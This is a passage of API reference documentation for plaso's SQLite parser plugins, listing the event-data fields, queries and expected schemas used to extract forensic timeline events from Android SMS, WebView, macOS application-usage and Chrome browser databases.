PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), account_name STRING DEFAULT NULL, account_type STRING DEFAULT NULL, data_set STRING DEFAULT NULL, sourceid TEXT, version INTEGER NOT NULL DEFAULT 1, dirty INTEGER NOT NULL DEFAULT 0, title TEXT, title_res INTEGER, notes TEXT, system_id TEXT, deleted INTEGER NOT NULL DEFAULT 0, group_visible INTEGER NOT NULL DEFAULT 0, should_sync INTEGER NOT NULL DEFAULT 1, auto_add INTEGER NOT NULL DEFAULT 0, favorites INTEGER NOT NULL DEFAULT 0, group_is_read_only INTEGER NOT NULL DEFAULT 0, sync1 TEXT, sync2 TEXT, sync3 TEXT, sync4 TEXT , account_id INTEGER REFERENCES accounts(_id))', 'mimetypes': 'CREATE TABLE mimetypes (_id INTEGER PRIMARY KEY AUTOINCREMENT, mimetype TEXT NOT NULL)', 'name_lookup': 'CREATE TABLE name_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_name TEXT NOT NULL, name_type INTEGER NOT NULL, PRIMARY KEY (data_id, normalized_name, name_type))', 'nickname_lookup': 'CREATE TABLE nickname_lookup (name TEXT, cluster TEXT)', 'packages': 'CREATE TABLE packages (_id INTEGER PRIMARY KEY AUTOINCREMENT, package TEXT NOT NULL)', 'phone_lookup': 'CREATE TABLE phone_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_number TEXT NOT NULL, min_match TEXT NOT NULL)', 'photo_files': 'CREATE TABLE photo_files (_id INTEGER PRIMARY KEY AUTOINCREMENT, height INTEGER NOT NULL, width INTEGER NOT NULL, filesize INTEGER NOT NULL)', 'properties': 'CREATE TABLE properties (property_key TEXT PRIMARY KEY, property_value TEXT )'}]

plaso.parsers.sqlite_plugins.android_sms module

SQLite parser plugin for Android text messages (SMS) database files.

class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataBases: plaso.containers.events.EventData

Android SMS event data.

addressphone number associated to the sender or receiver.

Type str

bodycontent of the SMS text message.

Type str

sms_readmessage read status, either Read or Unread.

Type str

sms_typemessage type, either Sent or Received.

Type str

DATA_TYPE = 'android:messaging:sms'

class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Android text messages (SMS) database files.



The Android text messages (SMS) database file is typically stored in: mmssms.dbs

DATA_FORMAT = 'Android text messages (SMS) SQLite database (mmssms.dbs) file'

NAME = 'android_sms'

ParseSmsRow(parser_mediator, query, row, **unused_kwargs)Parses an SMS row.

Parameters




QUERIES = [('SELECT _id AS id, address, date, read, type, body FROM sms', 'ParseSmsRow')]

REQUIRED_STRUCTURE = {'sms': frozenset({'_id', 'address', 'body', 'date', 'read', 'type'})}

SCHEMAS = [{'addr': 'CREATE TABLE addr (_id INTEGER PRIMARY KEY, msg_id INTEGER, contact_id INTEGER, address TEXT, type INTEGER, charset INTEGER)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'attachments': 'CREATE TABLE attachments (sms_id INTEGER, content_url TEXT, offset INTEGER)', 'canonical_addresses': 'CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT)', 'drm': 'CREATE TABLE drm (_id INTEGER PRIMARY KEY, _data TEXT)', 'part': 'CREATE TABLE part (_id INTEGER PRIMARY KEY AUTOINCREMENT, mid INTEGER, seq INTEGER DEFAULT 0, ct TEXT, name TEXT, chset INTEGER, cd TEXT, fn TEXT, cid TEXT, cl TEXT, ctt_s INTEGER, ctt_t TEXT, _data TEXT, text TEXT)', 'pd': 'CREATE TABLE pdu (_id INTEGER PRIMARY KEY AUTOINCREMENT, thread_id INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, msg_box INTEGER, read INTEGER DEFAULT 0, m_id TEXT, sub TEXT, sub_cs INTEGER, ct_t TEXT, ct_l TEXT, exp INTEGER, m_cls TEXT, m_type INTEGER, v INTEGER, m_size INTEGER, pri INTEGER, rr INTEGER, rpt_a INTEGER, resp_st INTEGER, st INTEGER, tr_id TEXT, retr_st INTEGER, retr_txt TEXT, retr_txt_cs INTEGER, read_status INTEGER, ct_cls INTEGER, resp_txt TEXT, d_tm INTEGER, d_rpt INTEGER, locked INTEGER DEFAULT 0, seen INTEGER DEFAULT 0, text_only INTEGER DEFAULT 0)', 'pending_msgs': 'CREATE TABLE pending_msgs (_id INTEGER PRIMARY KEY, proto_type INTEGER, msg_id INTEGER, msg_type INTEGER, err_type INTEGER, err_code INTEGER, retry_index INTEGER NOT NULL DEFAULT 0, due_time INTEGER, last_try INTEGER)', 'rate': 'CREATE TABLE rate (sent_time INTEGER)', 'raw': 'CREATE TABLE raw (_id INTEGER PRIMARY KEY, date INTEGER, reference_number INTEGER, count INTEGER, sequence INTEGER, destination_port INTEGER, address TEXT, pdu TEXT)', 'sms': 'CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT, person INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, protocol INTEGER, read INTEGER DEFAULT 0, status INTEGER DEFAULT -1, type INTEGER, reply_path_present INTEGER, subject TEXT, body TEXT, service_center TEXT, locked INTEGER DEFAULT 0, error_code INTEGER DEFAULT 0, seen INTEGER DEFAULT 0)', 'sr_pending': 'CREATE TABLE sr_pending (reference_number INTEGER, action TEXT, data TEXT)', 'threads': 'CREATE TABLE threads (_id INTEGER PRIMARY KEY AUTOINCREMENT, date INTEGER DEFAULT 0, message_count INTEGER DEFAULT 0, recipient_ids TEXT, snippet TEXT, snippet_cs INTEGER DEFAULT 0, read INTEGER DEFAULT 1, type INTEGER DEFAULT 0, error INTEGER DEFAULT 0, has_attachment INTEGER DEFAULT 0)', 'words': 'CREATE VIRTUAL TABLE words USING FTS3 (_id INTEGER PRIMARY KEY, index_text TEXT, source_id INTEGER, table_to_use INTEGER)', 'words_content': "CREATE TABLE 'words_content'(docid INTEGER PRIMARY KEY, 'c0_id', 'c1index_text', 'c2source_id', 'c3table_to_use')", 'words_segdir': "CREATE TABLE 'words_segdir'(level INTEGER, idx INTEGER, start_block INTEGER, leaves_end_block INTEGER, end_block INTEGER, root BLOB, PRIMARY KEY(level, idx))", 'words_segments': "CREATE TABLE 'words_segments'(blockid INTEGER PRIMARY KEY, block BLOB)"}]

SMS_READ = {0: 'UNREAD', 1: 'READ'}

SMS_TYPE = {1: 'RECEIVED', 2: 'SENT'}

plaso.parsers.sqlite_plugins.android_webview module

SQLite parser plugin for Android WebView database files.

class plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataBases: plaso.containers.events.EventData

Android WebView cookie event data.

cookie_namename of the cookie.

Type str

datadata stored in the cookie.

Type str

domainhost that set the cookie.

Type str

pathpath for which the cookie was set.

Type str

secureTrue if the cookie should only be transmitted over a secure channel.

Type bool

urlURL of the cookie.

Type str



DATA_TYPE = 'webview:cookie'

class plaso.parsers.sqlite_plugins.android_webview.WebViewPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Android WebView database files.

DATA_FORMAT = 'Android WebView SQLite database file'

NAME = 'android_webview'

ParseCookieRow(parser_mediator, query, row, **unused_kwargs)Parses a row from the database.

Parameters




QUERIES = frozenset({('SELECT _id, name, value, domain, expires, path, secure FROM cookies', 'ParseCookieRow')})

REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cookies': frozenset({'_id', 'domain', 'expires', 'name', 'path', 'secure', 'value'})}

SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cookies': 'CREATE TABLE cookies (_id INTEGER PRIMARY KEY, name TEXT, value TEXT, domain TEXT, path TEXT, expires INTEGER, secure INTEGER)', 'formdata': 'CREATE TABLE formdata (_id INTEGER PRIMARY KEY, urlid INTEGER, name TEXT, value TEXT, UNIQUE (urlid, name, value) ON CONFLICT IGNORE)', 'formurl': 'CREATE TABLE formurl (_id INTEGER PRIMARY KEY, url TEXT)', 'httpauth': 'CREATE TABLE httpauth (_id INTEGER PRIMARY KEY, host TEXT, realm TEXT, username TEXT, password TEXT, UNIQUE (host, realm) ON CONFLICT REPLACE)', 'password': 'CREATE TABLE password (_id INTEGER PRIMARY KEY, host TEXT, username TEXT, password TEXT, UNIQUE (host, username) ON CONFLICT REPLACE)'}]

plaso.parsers.sqlite_plugins.android_webviewcache module

SQLite parser plugin for Android WebviewCache database files.

class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventDataBases: plaso.containers.events.EventData

Android WebViewCache event data.

content_lengthsize of the cached content.

Type int

urlURL the content was retrieved from.

Type str

DATA_TYPE = 'android:webviewcache'

class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Android WebviewCache database files.

DATA_FORMAT = 'Android WebViewCache SQLite database file'

NAME = 'android_webviewcache'

ParseRow(parser_mediator, query, row, **unused_kwargs)Parses a row from the database.

Parameters






QUERIES = frozenset({('SELECT url, contentlength, expires, lastmodify FROM cache', 'ParseRow')})

REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cache': frozenset({'contentlength', 'expires', 'lastmodify', 'url'})}

SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cache': 'CREATE TABLE cache (_id INTEGER PRIMARY KEY, url TEXT, filepath TEXT, lastmodify TEXT, etag TEXT, expires INTEGER, expiresstring TEXT, mimetype TEXT, encoding TEXT, httpstatus INTEGER, location TEXT, contentlength INTEGER, contentdisposition TEXT, UNIQUE (url) ON CONFLICT REPLACE)'}]

plaso.parsers.sqlite_plugins.appusage module

SQLite parser plugin for MacOS application usage database files.

class plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS application usage database files.

The MacOS application usage database is typlically stored in: /var/db/application_usage.sqlite

Application usage is a SQLite database that logs down entries triggered by NSWorkspaceWillLaunchApplica-tionNotification and NSWorkspaceDidTerminateApplicationNotification NSWorkspace notifications by crankd.

More information can be found here: https://github.com/google/macops/blob/master/crankd/ApplicationUsage.py

DATA_FORMAT = 'MacOS application usage SQLite database (application_usage.sqlite) file'

NAME = 'appusage'

ParseApplicationUsageRow(parser_mediator, query, row, **unused_kwargs)Parses an application usage row.

Parameters




QUERIES = [('SELECT last_time, event, bundle_id, app_version, app_path, number_times FROM application_usage ORDER BY last_time', 'ParseApplicationUsageRow')]

REQUIRED_STRUCTURE = {'application_usage': frozenset({'app_path', 'app_version', 'bundle_id', 'event', 'last_time', 'number_times'})}

SCHEMAS = [{'application_usage': 'CREATE TABLE application_usage (event TEXT, bundle_id TEXT, app_version TEXT, app_path TEXT, last_time INTEGER DEFAULT 0, number_times INTEGER DEFAULT 0, PRIMARY KEY (event, bundle_id))'}]

class plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataBases: plaso.containers.events.EventData

MacOS application usage event data.

applicationname of the application.

Type str

app_versionversion of the application.

Type str

bundle_idbundle identifier of the application.


https://github.com/google/macops/blob/master/crankd/ApplicationUsage.py

https://github.com/google/macops/blob/master/crankd/ApplicationUsage.py


Type str

countTODO: number of times what?

Type int

DATA_TYPE = 'macosx:application_usage'

plaso.parsers.sqlite_plugins.chrome_autofill module

SQLite parser plugin for Google Chrome autofill database (Web Data) files.

class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventDataBases: plaso.containers.events.EventData

Chrome Autofill event data.

field_namename of form field.

Type str

valuevalue populated in form field.

Type str

usage_countcount of times value has been used in field_name.

Type int

DATA_TYPE = 'chrome:autofill:entry'

class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Google Chrome autofill database (Web Data) files.

The Google Chrome autofill database (Web Data) file is typically stored in: Web Data

DATA_FORMAT = 'Google Chrome autofill SQLite database (Web Data) file'

NAME = 'chrome_autofill'

ParseAutofillRow(parser_mediator, query, row, **unused_kwargs)Parses an autofill entry row.

Parameters




QUERIES = [('SELECT autofill.date_created, autofill.date_last_used, autofill.name, autofill.value, autofill.count FROM autofill ORDER BY date_created', 'ParseAutofillRow')]

REQUIRED_STRUCTURE = {'autofill': frozenset({'count', 'date_created', 'date_last_used', 'name', 'value'})}

SCHEMAS = [{'autofill': 'CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value));)'}]



plaso.parsers.sqlite_plugins.chrome_cookies module

SQLite parser plugin for Google Chrome cookies database files.

class plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Google Chrome cookies database files.

GA_UTMZ_TRANSLATION = {'utmccn': 'Ad campaign information.', 'utmcct': 'Path to the page of referring link.', 'utmcmd': 'Last type of visit.', 'utmcsr': 'Last source used to access.', 'utmctr': 'Keywords used to find site.'}

ParseCookieRow(parser_mediator, query, row, **unused_kwargs)Parses a cookie row.

Parameters



• row (sqlite3.Row) – row resulting from the query.

URLS = ['http://src.chromium.org/svn/trunk/src/net/cookies/', 'http://www.dfinews.com/articles/2012/02/google-analytics-cookies-and-forensic-implications']

class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePluginBases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin

SQLite parser plugin for Google Chrome 17 - 65 cookies database files.

DATA_FORMAT = 'Google Chrome 17 - 65 cookies SQLite database file'

NAME = 'chrome_17_cookies'

QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, secure, httponly, last_access_utc, has_expires, persistent FROM cookies', 'ParseCookieRow')]

REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'httponly', 'last_access_utc', 'name', 'path', 'persistent', 'secure', 'value'}), 'meta': frozenset({})}

SCHEMAS = [{'cookies': 'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY KEY, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure INTEGER NOT NULL, httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER DEFAULT 1, persistent INTEGER DEFAULT 1)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}]

class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePluginBases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin

SQLite parser plugin for Google Chrome 66+ cookies database files.

DATA_FORMAT = 'Google Chrome 66 and later cookies SQLite database file'

NAME = 'chrome_66_cookies'

QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, is_secure AS secure, is_httponly AS httponly, last_access_utc, has_expires, is_persistent AS persistent FROM cookies', 'ParseCookieRow')]

REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'is_httponly', 'is_persistent', 'is_secure', 'last_access_utc', 'name', 'path', 'value'}), 'meta': frozenset({})}

SCHEMAS = [{'cookies': "CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1, encrypted_value BLOB DEFAULT '', firstpartyonly INTEGER NOT NULL DEFAULT 0, UNIQUE (host_key, name, path))", 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}]

class plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventDataBases: plaso.containers.events.EventData

Chrome Cookie event data.

cookie_namename of the cookie.

Type str

hosthostname of host that set the cookie value.

Type str



httponlyTrue if the cookie cannot be accessed through client side script.

Type bool

pathpath where the cookie got set.

Type str

persistentTrue if the cookie is persistent.

Type bool


Type bool

urlURL or path where the cookie got set.

Type str

datavalue of the cookie.

Type str

DATA_TYPE = 'chrome:cookie:entry'

plaso.parsers.sqlite_plugins.chrome_extension_activity module

SQLite parser plugin for Google Chrome extension activity database files.

class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataBases: plaso.containers.events.EventData

Chrome Extension Activity event data.

action_typeaction type.

Type str

activity_idactivity identifier.

Type str

api_namename of API.

Type str

arg_urlURL argument.

Type str

argsarguments.

Type str



extension_idextension identifier.

Type str

otherother.

Type str

page_titletitle of webpage.

Type str

page_urlURL of webpage.

Type str

DATA_TYPE = 'chrome:extension_activity:activity_log'

class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Google Chrome extension activity database files.

The Google Chrome extension activity database file is typically stored in: Extension Activity

DATA_FORMAT = 'Google Chrome extension activity SQLite database file'

NAME = 'chrome_extension_activity'

ParseActivityLogUncompressedRow(parser_mediator, query, row, **unused_kwargs)Parses an activity log row.

Parameters




QUERIES = [('SELECT time, extension_id, action_type, api_name, args, page_url, page_title, arg_url, other, activity_id FROM activitylog_uncompressed ORDER BY time', 'ParseActivityLogUncompressedRow')]

REQUIRED_STRUCTURE = {'activitylog_compressed': frozenset({'action_type', 'activity_id', 'api_name', 'arg_url', 'args', 'extension_id', 'other', 'page_title', 'page_url', 'time'})}

SCHEMAS = [{'activitylog_compressed': 'CREATE TABLE activitylog_compressed (count INTEGER NOT NULL DEFAULT 1, extension_id_x INTEGER NOT NULL, time INTEGER, action_type INTEGER, api_name_x INTEGER, args_x INTEGER, page_url_x INTEGER, page_title_x INTEGER, arg_url_x INTEGER, other_x INTEGER)', 'string_ids': 'CREATE TABLE string_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)', 'url_ids': 'CREATE TABLE url_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)'}]

plaso.parsers.sqlite_plugins.chrome_history module

SQLite parser plugin for Google Chrome history database files.

class plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Google Chrome history database files.

The Google Chrome history database file is typically stored in: Archived History History

Note that the Archived History database does not contain the downloads table.



ParseLastVisitedRow(parser_mediator, query, row, cache=None, database=None, **un-used_kwargs)

Parses a last visited row.

Parameters




• cache (SQLiteCache) – cache which contains cached results from querying the visitsand urls tables.

• database (Optional[SQLiteDatabase]) – database.

class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventDataBases: plaso.containers.events.EventData

Chrome History file downloaded event data.

full_pathfull path where the file was downloaded to.

Type str

received_bytesnumber of bytes received while downloading.

Type int

total_bytestotal number of bytes to download.

Type int

urlURL of the downloaded file.

Type str

DATA_TYPE = 'chrome:history:file_downloaded'

class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventDataBases: plaso.containers.events.EventData

Chrome History page visited event data.

from_visitURL where the visit originated from.

Type str

page_transition_typetype of transitions between pages.

Type int

titletitle of the visited page.

Type str

typed_countnumber of characters of the URL that were typed.



Type int

urlURL of the visited page.

Type str

url_hiddenTrue if the URL is hidden.

Type bool

visit_sourcesource of the page visit.

Type int

DATA_TYPE = 'chrome:history:page_visited'

class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPluginBases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin

SQLite parser plugin for Google Chrome 27+ history database files.

DATA_FORMAT = 'Google Chrome 27 and later history SQLite database file'

NAME = 'chrome_27_history'

ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs)Parses a file downloaded row.

Parameters




QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT downloads.id AS id, downloads.start_time,downloads.target_path, downloads_url_chains.url, downloads.received_bytes, downloads.total_bytes FROM downloads, downloads_url_chains WHERE downloads.id = downloads_url_chains.id', 'ParseFileDownloadedRow')]

REQUIRED_STRUCTURE = {'downloads': frozenset({'id', 'received_bytes', 'start_time', 'target_path', 'total_bytes'}), 'downloads_url_chains': frozenset({'id', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}

SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit 